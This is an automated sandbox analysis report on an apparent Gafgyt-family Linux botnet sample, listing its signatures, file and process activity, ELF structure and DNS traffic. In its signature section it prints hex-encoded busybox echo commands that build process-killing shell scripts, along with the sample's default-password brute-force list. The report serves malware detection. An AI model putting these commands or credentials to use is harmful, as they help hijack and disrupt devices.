Edit tour

Linux Analysis Report
sh4.elf

Overview

General Information

Sample name:sh4.elf
Analysis ID:1654340
MD5:74a19f8d135f7132780ffddb8077d3fe
SHA1:7a3b606151e7699617e1f40d121d72d308df9568
SHA256:26b00fffb4dcfdf0e6531bc3409c6c14755cd8673c66036b202ac15bc51561d6
Tags:elfuser-abuse_ch
Infos:

Detection

Score:48
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
Enumerates processes within the "proc" file system
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1654340
Start date and time:2025-04-02 09:52:53 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 39s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:sh4.elf
Detection:MAL
Classification:mal48.linELF@0/4@2/0
Command:/tmp/sh4.elf
PID:5536
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
For God so loved the world
Standard Error:
  • system is lnxubuntu20
  • sh4.elf (PID: 5536, Parent: 5450, MD5: 8943e5f8f8c280467b4472c15ae93ba9) Arguments: /tmp/sh4.elf
    • sh4.elf New Fork (PID: 5540, Parent: 5536)
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: sh4.elfReversingLabs: Detection: 33%
Source: /tmp/sh4.elf (PID: 5540)Socket: 127.0.0.1:22448Jump to behavior
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x77\x68\x69\x6c\x65\x20\x72\x65\x61\x64\x20\x2d\x72\x20\x6c\x3b\x20\x64\x6f\x20\x6d\x70\x3d\x24\x28\x65\x63\x68\x6f\x20\x22\x24" > kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6c\x22\x20\x7c\x20\x61\x77\x6b\x20\x27\x7b\x70\x72\x69\x6e\x74\x20\x24\x32\x7d\x27\x20\x7c\x20\x73\x65\x64\x20\x27\x73\x2f\x5c" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x5c\x30\x34\x30\x2f\x20\x2f\x67\x27\x29\x3b\x20\x63\x61\x73\x65\x20\x22\x24\x6d\x70\x22\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x5b\x30\x2d\x39\x5d\x2a\x29\x20\x70\x69\x64\x3d\x24\x7b\x6d\x70\x23\x2f\x70\x72\x6f\x63\x2f\x7d\x3b\x20\x5b\x20\x2d\x64\x20\x22" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x2f\x70\x72\x6f\x63\x2f\x24\x70\x69\x64\x22\x20\x5d\x20\x26\x26\x20\x6b\x69\x6c\x6c\x20\x2d\x39\x20\x22\x24\x70\x69\x64\x22\x20" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26\x26\x20\x75\x6d\x6f\x75\x6e\x74\x20\x22\x24\x6d\x70\x22\x20\x32\x3e\x2f\x64" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x3b\x20\x65\x73\x61\x63\x3b\x20\x64\x6f\x6e\x65\x20\x3c\x20\x2f\x70\x72\x6f\x63\x2f\x6d\x6f\x75" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6e\x74\x73" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x66\x6f\x72\x20\x70\x69\x64\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f\x5b\x30\x2d\x39\x5d\x2a\x3b\x20\x64\x6f\x20\x70\x69\x64\x5f" > swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6e\x75\x6d\x3d\x22\x24\x7b\x70\x69\x64\x23\x23\x2a\x2f\x7d\x22\x3b\x20\x69\x66\x20\x5b\x20\x2d\x72\x20\x22\x24\x70\x69\x64\x2f" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6d\x61\x70\x73\x22\x20\x5d\x3b\x20\x74\x68\x65\x6e\x20\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x3d\x74\x72\x75\x65\x3b\x20\x77" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x68\x69\x6c\x65\x20\x49\x46\x53\x3d\x20\x72\x65\x61\x64\x20\x2d\x72\x20\x6c\x69\x6e\x65\x3b\x20\x64\x6f\x20\x63\x61\x73\x65\x20" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x22\x24\x6c\x69\x6e\x65\x22\x20\x69\x6e\x20\x2a\x22\x2f\x6c\x69\x62\x2f\x22\x2a\x7c\x2a\x22\x2f\x6c\x69\x62\x36\x34\x2f\x22\x2a" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x7c\x2a\x22\x2e\x73\x6f\x22\x2a\x29\x20\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x3d\x66\x61\x6c\x73\x65\x3b\x20\x62\x72\x65\x61" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6b\x3b\x3b\x20\x65\x73\x61\x63\x3b\x20\x64\x6f\x6e\x65\x20\x3c\x20\x22\x24\x70\x69\x64\x2f\x6d\x61\x70\x73\x22\x3b\x20\x69\x66" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x20\x5b\x20\x22\x24\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x22\x20\x3d\x20\x74\x72\x75\x65\x20\x5d\x3b\x20\x74\x68\x65\x6e\x20" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6b\x69\x6c\x6c\x20\x2d\x39\x20\x22\x24\x70\x69\x64\x5f\x6e\x75\x6d\x22\x3b\x20\x66\x69\x3b\x20\x66\x69\x3b\x20\x64\x6f\x6e\x65" >> swan
Source: Initial sampleString containing 'busybox' found: sh kmount/bin/busybox echo -ne "\x66\x6f\x72\x20\x70\x69\x64\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f\x5b\x30\x2d\x39\x5d\x2a\x3b\x20\x64\x6f\x20\x70\x69\x64\x5f" > swan
Source: Initial sampleString containing potential weak password found: 12345
Source: Initial sampleString containing potential weak password found: 54321
Source: Initial sampleString containing potential weak password found: 654321
Source: Initial sampleString containing potential weak password found: admin1234
Source: Initial sampleString containing potential weak password found: administrator
Source: Initial sampleString containing potential weak password found: supervisor
Source: Initial sampleString containing potential weak password found: password
Source: Initial sampleString containing potential weak password found: default
Source: Initial sampleString containing potential weak password found: guest
Source: Initial sampleString containing potential weak password found: service
Source: Initial sampleString containing potential weak password found: support
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal48.linELF@0/4@2/0
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/235/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/115/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/1333/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/1333/fdJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/1333/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/116/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/1695/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/1695/fdJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/1695/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/117/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/118/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/119/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/911/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/914/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/3877/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/3877/fdJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/3877/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/10/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/917/fdJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/11/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/12/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/13/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/14/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/15/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/16/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/17/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/18/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/19/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/1591/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/1591/fdJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/1591/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/120/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/121/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/1/mapsJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/1/fdJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/122/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/243/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/2/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/123/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/3/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/124/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/1588/fdJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/125/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/4/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/246/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/126/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/5/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/127/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/6/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/1585/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/1585/fdJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/1585/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/128/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/7/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/129/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/8/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/800/fdJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/9/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/802/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/802/fdJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/802/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/803/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/803/fdJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/803/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/804/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/804/fdJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/804/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/20/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/21/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/3407/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/3407/fdJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/3407/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/22/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/23/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/24/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/25/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/26/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/27/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/28/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/29/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/1484/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/1484/fdJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/1484/mapsJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/1484/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/490/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/490/fdJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/490/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/250/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/130/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)File opened: /proc/251/cmdlineJump to behavior
Source: /tmp/sh4.elf (PID: 5536)Queries kernel information via 'uname': Jump to behavior
Source: sh4.elf, 5536.1.00007fd0dc426000.00007fd0dc42d000.rw-.sdmp, sh4.elf, 5540.1.00007fd0dc426000.00007fd0dc42d000.rw-.sdmpBinary or memory string: B!!a1gAWFxuAXsFWUgBRQAA!!a1gAWFxuAXsAWUgKRXgA!!a1gAWFxuAXsAWEgJR3IA!!a10CWFxuAHsGWVcWQHAA!!a10CWFxuAHsGWVcWQHUA!!aFwAWF9uA3sGW0gLRgAA!!aFwAWFlpG2QBW0gJTwAA!!qemu-arm2QBW0gJTwAA!
Source: sh4.elf, 5540.1.00007ffcbabc3000.00007ffcbabe4000.rw-.sdmpBinary or memory string: exed the wor!/qemu-open.XXXXX
Source: sh4.elf, 5540.1.00007fd0dc426000.00007fd0dc42d000.rw-.sdmpBinary or memory string: vmware
Source: sh4.elf, 5536.1.00007ffcbabc3000.00007ffcbabe4000.rw-.sdmpBinary or memory string: /tmp/qemu-open.3xMUWP
Source: sh4.elf, 5536.1.00007fd0dc426000.00007fd0dc42d000.rw-.sdmp, sh4.elf, 5540.1.00007fd0dc426000.00007fd0dc42d000.rw-.sdmpBinary or memory string: qemu-arm
Source: sh4.elf, 5536.1.00007ffcbabc3000.00007ffcbabe4000.rw-.sdmp, sh4.elf, 5540.1.00007ffcbabc3000.00007ffcbabe4000.rw-.sdmpBinary or memory string: /qemu-open.XXXXX
Source: sh4.elf, 5536.1.00007ffcbabc3000.00007ffcbabe4000.rw-.sdmp, sh4.elf, 5540.1.00007ffcbabc3000.00007ffcbabe4000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sh4
Source: sh4.elf, 5536.1.00007ffcbabc3000.00007ffcbabe4000.rw-.sdmpBinary or memory string: U/tmp/qemu-open.3xMUWP\
Source: sh4.elf, 5536.1.000055da058ce000.000055da0597d000.rw-.sdmp, sh4.elf, 5540.1.000055da058ce000.000055da0597d000.rw-.sdmpBinary or memory string: U5!/etc/qemu-binfmt/sh4
Source: sh4.elf, 5536.1.000055da058ce000.000055da0597d000.rw-.sdmp, sh4.elf, 5540.1.000055da058ce000.000055da0597d000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/sh4
Source: sh4.elf, 5536.1.00007ffcbabc3000.00007ffcbabe4000.rw-.sdmp, sh4.elf, 5540.1.00007ffcbabc3000.00007ffcbabe4000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-sh4/tmp/sh4.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/sh4.elf
Source: sh4.elf, 5540.1.00007ffcbabc3000.00007ffcbabe4000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionDirect Volume Access1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local System1
Non-Application Layer Protocol
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkit1
Brute Force
Application Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1654340 Sample: sh4.elf Startdate: 02/04/2025 Architecture: LINUX Score: 48 11 daisy.ubuntu.com 2->11 13 Multi AV Scanner detection for submitted file 2->13 7 sh4.elf 2->7         started        signatures3 process4 process5 9 sh4.elf 7->9         started       
SourceDetectionScannerLabelLink
sh4.elf33%ReversingLabsLinux.Backdoor.Gafgyt
No Antivirus matches
No Antivirus matches
No Antivirus matches

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
daisy.ubuntu.com
162.213.35.24
truefalse
    high
    No contacted IP infos
    No context
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    daisy.ubuntu.coms-h.4-.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
    • 162.213.35.24
    x-8.6-.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
    • 162.213.35.24
    arm.elfGet hashmaliciousMiraiBrowse
    • 162.213.35.25
    FBI.arm.elfGet hashmaliciousGafgyt, MiraiBrowse
    • 162.213.35.24
    FBI.sh4.elfGet hashmaliciousGafgyt, MiraiBrowse
    • 162.213.35.24
    FBI.arm7.elfGet hashmaliciousGafgyt, MiraiBrowse
    • 162.213.35.25
    FBI.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
    • 162.213.35.25
    FBI.ppc.elfGet hashmaliciousGafgyt, MiraiBrowse
    • 162.213.35.24
    FBI.arm6.elfGet hashmaliciousGafgyt, MiraiBrowse
    • 162.213.35.24
    mpsl.elfGet hashmaliciousUnknownBrowse
    • 162.213.35.25
    No context
    No context
    No context
    Process:/tmp/sh4.elf
    File Type:ASCII text, with no line terminators
    Category:dropped
    Size (bytes):13
    Entropy (8bit):3.5465935642949384
    Encrypted:false
    SSDEEP:3:TgKYn:TgKYn
    MD5:AEF4020327A62D78F5A8202D453B0A74
    SHA1:84FC7A7CBE0B4EF5BDB927B95EA1BD01665BE8B1
    SHA-256:1878DDF74B755A998CBFD2140779771966ADF507D2B95CA86906476BFD80575B
    SHA-512:0E1BF58363F746F19B92730E15E2091F05A2C87B120B004F3819735F4D60268E66711EBEB06E3B771B2DE327FCBB3DDD368241E7A6E1A1B759384F6D70A2C528
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview:/tmp/sh4.elf.
    Process:/tmp/sh4.elf
    File Type:ASCII text
    Category:dropped
    Size (bytes):360
    Entropy (8bit):3.8142074438312226
    Encrypted:false
    SSDEEP:6:URJdFYgDF1SWdIwY/VUAaDF1S85qY/VKAvVVyAb/3hM/V+4D/VH:ITFtdKkNUaVIAbRMfF
    MD5:00433E10F7961F10768E16F6B913058B
    SHA1:0E45BC1C20A4AE2A57AA4147F13176B09615280D
    SHA-256:8FA99E554C95B73B085243C98A6E4A72EFE7E5BB1C53EE2EAD6B1467D30D4D38
    SHA-512:2E09BB11002E8F6CA0235538372C669798F286AFC8A4268913A1262DA0F26F817B6537C47742EF0B22F5CB001FE0C967B8B82D722035973D2803FFF067B0DCCF
    Malicious:false
    Reputation:low
    Preview:400000-415000 r-xp 00000000 fd:00 531606 /tmp/sh4.elf.425000-426000 rw-p 00015000 fd:00 531606 /tmp/sh4.elf.426000-42d000 rw-p 00000000 00:00 0 .7f7fe000-7f7ff000 r--p 00000000 fd:00 793309 /usr/lib/x86_64-linux-gnu/libm-2.31.so.7f7ff000-7f800000 ---p 00000000 00:00 0 .7f800000-80000000 rw-p 00000000 00:00 0 [stack].
    Process:/tmp/sh4.elf
    File Type:ASCII text, with no line terminators
    Category:dropped
    Size (bytes):13
    Entropy (8bit):3.5465935642949384
    Encrypted:false
    SSDEEP:3:TgKYn:TgKYn
    MD5:AEF4020327A62D78F5A8202D453B0A74
    SHA1:84FC7A7CBE0B4EF5BDB927B95EA1BD01665BE8B1
    SHA-256:1878DDF74B755A998CBFD2140779771966ADF507D2B95CA86906476BFD80575B
    SHA-512:0E1BF58363F746F19B92730E15E2091F05A2C87B120B004F3819735F4D60268E66711EBEB06E3B771B2DE327FCBB3DDD368241E7A6E1A1B759384F6D70A2C528
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview:/tmp/sh4.elf.
    Process:/tmp/sh4.elf
    File Type:ASCII text, with no line terminators
    Category:dropped
    Size (bytes):13
    Entropy (8bit):3.5465935642949384
    Encrypted:false
    SSDEEP:3:TgKYn:TgKYn
    MD5:AEF4020327A62D78F5A8202D453B0A74
    SHA1:84FC7A7CBE0B4EF5BDB927B95EA1BD01665BE8B1
    SHA-256:1878DDF74B755A998CBFD2140779771966ADF507D2B95CA86906476BFD80575B
    SHA-512:0E1BF58363F746F19B92730E15E2091F05A2C87B120B004F3819735F4D60268E66711EBEB06E3B771B2DE327FCBB3DDD368241E7A6E1A1B759384F6D70A2C528
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview:/tmp/sh4.elf.
    File type:ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), dynamically linked, stripped
    Entropy (8bit):6.888737595544536
    TrID:
    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
    File name:sh4.elf
    File size:86'868 bytes
    MD5:74a19f8d135f7132780ffddb8077d3fe
    SHA1:7a3b606151e7699617e1f40d121d72d308df9568
    SHA256:26b00fffb4dcfdf0e6531bc3409c6c14755cd8673c66036b202ac15bc51561d6
    SHA512:ec7eaac85e9174a0d845c7d197765e2e160ded12046c909d219a233c95c4f28749524183369aeae0a9f2b89b0332d33b3968714aaf5ba4b59455328462c334cb
    SSDEEP:1536:eko/xVM5PcnD+TM41i+cG9LH/oUNCrdTlnOVr:e1/M5PcDcHnr3ErdE
    TLSH:DC838E72B8207D9ACC1925B6F070CA798F116AA140C21DB7ADEDF2744057E89F94EF6C
    File Content Preview:.ELF..............*.......@.4....Q......4. ...(...............@...@..I...I...............P...PB..PB.....0H............................................././"O.n......#.*@........#.*@....&O.n.l..................................././.../.a"O.!...n...a.b("...q.

    ELF header

    Class:ELF32
    Data:2's complement, little endian
    Version:1 (current)
    Machine:<unknown>
    Version Number:0x1
    Type:EXEC (Executable file)
    OS/ABI:UNIX - System V
    ABI Version:0
    Entry Point Address:0x4001a0
    Flags:0xc
    ELF Header Size:52
    Program Header Offset:52
    Program Header Size:32
    Number of Program Headers:3
    Section Header Offset:86468
    Section Header Size:40
    Number of Section Headers:10
    Header String Table Index:9
    NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
    NULL0x00x00x00x00x0000
    .initPROGBITS0x4000940x940x2e0x00x6AX004
    .textPROGBITS0x4000e00xe00x120000x00x6AX0032
    .finiPROGBITS0x4120e00x120e00x220x00x6AX004
    .rodataPROGBITS0x4121040x121040x28840x00x2A004
    .ctorsPROGBITS0x4250dc0x150dc0x80x00x3WA004
    .dtorsPROGBITS0x4250e40x150e40x80x00x3WA004
    .dataPROGBITS0x4250f00x150f00x940x00x3WA004
    .bssNOBITS0x4251840x151840x47880x00x3WA004
    .shstrtabSTRTAB0x00x151840x3e0x00x0001
    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
    LOAD0x00x4000000x4000000x149880x149886.98720x5R E0x10000.init .text .fini .rodata
    LOAD0x150dc0x4250dc0x4250dc0xa80x48304.08140x6RW 0x10000.ctors .dtors .data .bss
    DYNAMIC0x00x00x00x00x00.00000x7RWE0x4

    Download Network PCAP: filteredfull

    TimestampSource PortDest PortSource IPDest IP
    Apr 2, 2025 09:53:49.804879904 CEST4767453192.168.2.151.1.1.1
    Apr 2, 2025 09:53:49.804933071 CEST3713953192.168.2.151.1.1.1
    Apr 2, 2025 09:53:49.903721094 CEST53371391.1.1.1192.168.2.15
    Apr 2, 2025 09:53:49.974729061 CEST53476741.1.1.1192.168.2.15
    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
    Apr 2, 2025 09:53:49.804879904 CEST192.168.2.151.1.1.10xc3e6Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
    Apr 2, 2025 09:53:49.804933071 CEST192.168.2.151.1.1.10xc898Standard query (0)daisy.ubuntu.com28IN (0x0001)false
    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
    Apr 2, 2025 09:53:49.974729061 CEST1.1.1.1192.168.2.150xc3e6No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
    Apr 2, 2025 09:53:49.974729061 CEST1.1.1.1192.168.2.150xc3e6No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false

    System Behavior

    Start time (UTC):07:53:46
    Start date (UTC):02/04/2025
    Path:/tmp/sh4.elf
    Arguments:-
    File size:4139976 bytes
    MD5 hash:8943e5f8f8c280467b4472c15ae93ba9